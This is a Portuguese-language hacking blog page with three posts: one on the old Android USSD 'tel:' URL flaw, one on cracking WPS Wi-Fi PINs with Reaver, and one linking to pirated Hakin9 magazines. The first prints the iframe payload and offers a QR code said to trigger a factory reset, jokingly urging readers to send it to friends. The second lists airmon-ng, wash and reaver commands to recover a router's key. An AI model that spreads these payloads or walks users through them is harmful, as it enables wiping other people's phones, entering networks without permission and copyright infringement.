Perigosa falha para Android

Qualquer aparelho que não esteja rodando pelo menos a versão Jelly Bean pode estar vulnerável. O estrago depende do modelo do aparelho, sendo que a falha mais grave foi apontada em alguns aparelhos Samsung, onde o exploit consegue formatar o aparelho e inutilizar o cartão SIM sem que o usuário possa fazer nada.

O exploit consiste em enviar um URL malicioso para o aparelho da vítima. Pode ser o resultado de uma busca no google, um email, um SMS, um QR code, etc. Qualquer forma de exibir um URL para o usuário funciona. Se o usuário clicar no URL e o aparelho for vulnerável, acabou-se.

O URL vem com um código USSD, desses que a gente usa para acessar opções avançadas do telefone e funciona discando algo como *#66445#*.  O problema é que alguns desses códigos podem ferrar com o telefone e são “discados” sem qualquer pergunta nos telefones vulneráveis.

Você pode testar se seu telefone é vulnerável visitando esta página com ele. O autor do blog, Dylan Reeve, demonstra o problema usando um código USSD inócuo, que só mostra o IMEI do telefone na tela. Eu testei com meu xing-ling Android, Hero H200, e imediatamente ao visitar a página abriu-se o discador e uma janela na frente dele com os dois IMEI do meu telefone. Nenhuma confirmação foi pedida.

A implementação é simples, ao alcance de qualquer “ráquer” wannabe. Bastou colocar isso na página:

<iframe src=”tel:*%2306%23″ />

Quer fazer um teste? Leia este qrcode:

 

 

 

 

 

 

Beleza, ele só mostra o IMEI. e se no lugar do IMEI, eu colocasse um FACTORY RESET?
PERIGO! NÃO FAÇAM ISSO! Se quiser testar o factory reset, leia o QR CODE Abaixo:

QRCode

 

 

 

 

 

 

 

Se quiser sacanear algum amigo, mande esse qrcode ai pra ele! hehehe.. Se ele não tiver um Jelly bean instalado, a amizade vai acabar hehehe.. Cuidado com os QRCODES que voces andam lendo por ai!

Proteção: no momento, a melhor maneira de se proteger é usar o auto-reset blocker. Apesar do nome, o programa ajuda a te proteger de qualquer código USSD malicioso, vindo por qualquer vetor. Ele se instala como um discador e quando o sistema processar um link de telefone, irá abrir uma janela perguntando que discador usar. Escolha o auto-reset blocker. O programa então exibirá qual o número que vai ser discado, dando sua opinião sobre o mesmo (se é seguro ou não), mas deixará por sua conta se vai aceitar ou não a discagem. OBS:  Telstop faz a mesma coisa!

Anúncios

Vulnerabilidade WIFI mediante WPS

WPS ou Wi-Fi Protected Setup como diz a Wikipedia WPS é um padrão promovido por a Wi-Fi Alliance para a criação de redes WLAN seguras. Em outras palavras, WPS não é um mecanismo de segurança por sí só, se trata da definição de diversos mecanismos para facilitar a configuração de una rede WLAN segura com WPA2, pensados para minimizar a intervenção do usuário em ambiente domésticos o pequenas oficinas (SOHO). Concretamente, WPS define os mecanismos a través dos quais os diferentes dispositivos da  rede obtem as credenciais (SSID y PSK) necesarias para iniciar o processo de autenticação.

Vamos ao que interessa, primeiro baixem o Reaver.

Uma vez dentro da pasta onde descargamos Reaver deve-se descomprimi-lo:

airmon-ng start wlan0

wash -i mon0

reaver -i mon0 -b 00:00:00:00:00:00 -vv   (Em este passo os dará o PIN, atentos)

reaver -i mon0 -b 00:00:00:00:00:00 -p PIN -vv  (Os dará em texto plano a clave)

Este método de pegar a chave resulta um poco pesado, pois pode durar entre 1 e 3 horas dependendo da qualidade do sinal.

Os deixo com este vídeo que me serviu muito para realizar estas provas. E senhores desativem WPS de seus routers.

Para ver um tutorial mais explicado, CLIQUE AQUI

Todas as Hakin9 de 2012

Para quem não sabe, a revista Hakin9 é focada em segurança da informação e, em minha opinião, uma das melhores

Antigamente, a Hakin9 possuía um política bem interessante que dava direito ao download de suas edições anteriores. A quantidade de propaganda na própria revista era bem menor que na atual.

Hoje, as coisas mudaram. Você só consegue baixar algumas edições no mercado paralelo, e ainda corre o risco de receber alguns e-mails com ameaças quanto a processos.

Bom, vamos ao que interessa. O link para download do arquivo é esse aqui. Baixem e logo o material e bons estudos.